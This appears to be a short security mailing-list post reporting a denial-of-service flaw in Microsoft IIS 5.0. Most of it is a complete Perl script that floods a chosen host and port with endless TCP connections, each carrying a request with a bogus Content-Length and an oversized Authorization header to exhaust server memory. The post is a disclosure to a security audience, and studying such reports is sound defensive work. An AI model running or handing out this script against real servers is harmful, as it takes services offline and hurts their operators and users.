Microsoft IIS/5.0 Content-Length DoS (proved)

["Ivan Hernandez Puga" <ivan.hernandez () globalsis com ar>]

Well, finally I have done testing about and I have made a 1gb RAM server
to get Out Of Virtual Memory and basically unusable with one script that
uses the flaw exposed on the other mails.
I suppose that now it's a real security bug.

Thanks

Ivan Hernandez
------------------------------------------------------------------------
----------------------------------------------#!/usr/bin/perl
# Written by Ivan Hernandez over code of Georgi Guninski 
use IO::Socket;

print "IIS 5.0 Bogus Content-Length\n";

$port = @ARGV[1];
$host = @ARGV[0];

        $req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";

$i=0;
        while (1) {
                $socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => "TCP");
                syswrite($socket[$i],$req,length($req));
                        print ".";
                        $i++;
                
        }

$i=0;

print "\nDone.";

------------------------------------------------------------------------
----------------------------------------------